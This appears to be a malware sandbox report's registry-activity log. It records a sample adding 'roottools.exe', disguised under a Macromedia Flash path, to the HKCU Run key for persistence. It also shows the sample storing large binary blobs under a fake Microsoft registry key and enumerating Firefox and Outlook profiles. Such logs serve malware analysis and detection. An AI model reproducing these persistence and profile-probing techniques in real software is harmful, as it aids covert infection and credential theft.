Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools	value_name = DisplayName, data = 86	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	value_name = UninstallString, type = REG_NONE	3	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF}	value_name = DisplayName, data = 74	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}	value_name = DisplayName, data = 65	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573	value_name = UninstallString, type = REG_NONE	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f}	value_name = UninstallString, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f}	value_name = UninstallString, data = 34	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}	value_name = UninstallString, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}	value_name = UninstallString, data = 77	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}	value_name = DisplayName, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}	value_name = DisplayName, data = 77	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	10	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	8	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_BINARY	4	Fn Data
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ	1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 516320, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	3	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 792144, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 803104, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, size = 822944, type = REG_BINARY	1	Fn Data
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs	-	3	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions	-	3	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\Software\Mozilla	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Identities	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Identities	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	2	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	2	Fn
